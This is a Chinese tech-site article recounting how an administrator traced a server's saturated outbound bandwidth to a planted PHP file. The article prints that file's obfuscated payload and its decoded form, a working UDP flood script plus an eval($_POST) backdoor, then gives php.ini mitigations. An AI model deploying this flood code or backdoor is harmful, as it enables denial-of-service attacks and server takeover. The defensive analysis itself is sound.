綠色資源網(wǎng):您身邊最放心的安全下載站! 最新軟件|熱門排行|軟件分類|軟件專題|論壇轉(zhuǎn)帖|廠商大全

綠色資源網(wǎng)

技術(shù)教程
您的位置:首頁(yè)服務(wù)器類Web服務(wù)器 → w3wp.exe上傳流量帶寬占用很大問(wèn)題的解決經(jīng)歷

w3wp.exe上傳流量帶寬占用很大問(wèn)題的解決經(jīng)歷

我要評(píng)論 2011/12/31 09:00:39 來(lái)源:綠色資源網(wǎng) 編輯:downcc.com [ ] 評(píng)論:0 點(diǎn)擊:775次

近來(lái)有一兩臺(tái)服務(wù)器網(wǎng)絡(luò)常出現(xiàn)問(wèn)題,甚至斷網(wǎng),PING直接大量掉包。重啟后正常。

后經(jīng)查,帶寬占用過(guò)高,出現(xiàn)問(wèn)題時(shí)帶寬占用百分之一百。初步估計(jì)是有攻擊了,使用監(jiān)控觀察,有少量UDP攻擊(據(jù)經(jīng)驗(yàn)如此量的UDP是不會(huì)占用一百M(fèi)的,也十分疑惑)。啟動(dòng)攻擊防御措施,但無(wú)濟(jì)于事。后查看單個(gè)網(wǎng)站帶寬,也沒有異常。
查看帶寬進(jìn)出的吞吐量,當(dāng)帶寬占用過(guò)高的時(shí)候,是發(fā)送字節(jié)吞吐量占用百分之一百。而接收幾乎為零。這不像是DDOS攻擊,不排除會(huì)有“下載攻擊”。搜索大型壓縮文件、視頻文件、應(yīng)用程序并禁止下載。還是會(huì)出現(xiàn)類似的情況。
后裝入DU METER和某一個(gè)帶有流量監(jiān)控功能的軟件。等待“攻擊”再次到來(lái)。“攻擊”過(guò)后登陸后查看,確實(shí)是長(zhǎng)時(shí)間占用了大量帶寬。查看是W3WP.EXE發(fā)送的流量比較多。達(dá)數(shù)十G之巨。記錄每一個(gè)W3WP.EXE進(jìn)程的PID并使用IISAPP查看對(duì)應(yīng)的程序池。結(jié)束發(fā)送流量最大的W3WP.EXE,再查看少了哪一個(gè)W3WP.EXE對(duì)應(yīng)的程序池。跟著把當(dāng)前程序池下所有的網(wǎng)站分池。設(shè)置每一個(gè)網(wǎng)站單獨(dú)一個(gè)程序池。再一次等待“攻擊”。等新的“攻擊”來(lái)后,再使用上面的方法查到是某一個(gè)程序池,這樣就查到了出問(wèn)題的站點(diǎn)。仔細(xì)檢查后,網(wǎng)站內(nèi)除了HTM文件、部分圖片和一個(gè)PHP文件外,僅有一個(gè)目錄里含有ASP文件。直接停止含ASP文件的目錄讀取權(quán)限。問(wèn)題還是存在,所以把目光盯到PHP文件上。查看IIS日志后看到有這么一行日志2010-09-05 13:21:25 W3SVC83 60.191.XXX.XXX GET /help.php ip=222.87.129.XXX&port=80&time=7200 80 - 122.225.115.XXX Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 401 5 5 1726 410。 問(wèn)題就已經(jīng)很清楚了。在瀏覽器里面輸入WWW.域名.COM/help.php ip=222.87.129.XXX&port=80&time=7200服務(wù)器帶寬占用立馬漲為百分之一百。
查到問(wèn)題所在,分析PHP文件。

源文件:
<?php eval(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
解密后:
<?php

$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET['time'];

$time = time();
print 'Flooded: $ip on port $rand <br><br>';
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
        $out .= 'X';
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
       
        $fp = fsockopen('udp://$ip', $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo 'Packet complete at '.time('h:i:s').' with $packets (' . round(($packets*65)/1024, 2) . ' mB) packets averaging '. round($packets/$exec_time, 2) . ' packets/s n';
?>
<?php eval($_POST[ddos])?>

有了代碼,那工作原理也就很清楚了。
整體來(lái)說(shuō),不是受攻擊了。而是攻擊別人了。

解決辦法:

不允許PHP使用網(wǎng)絡(luò),把php.ini里的allow_url_fopen 值改為allow_url_fopen = Off

如果不行

;extension=php_sockets.dll (限制使用sockets.dll)
;ignore_user_abort = On
這兩項(xiàng)前加上分號(hào)。
但默認(rèn)這兩項(xiàng)就是這樣設(shè)置的。防止某些同志手動(dòng)打開了的。
然后重啟IIS。

關(guān)鍵詞:w3wp.exe

閱讀本文后您有什么感想? 已有 人給出評(píng)價(jià)!

  • 1 歡迎喜歡
  • 1 白癡
  • 1 拜托
  • 1 哇
  • 1 加油
  • 1 鄙視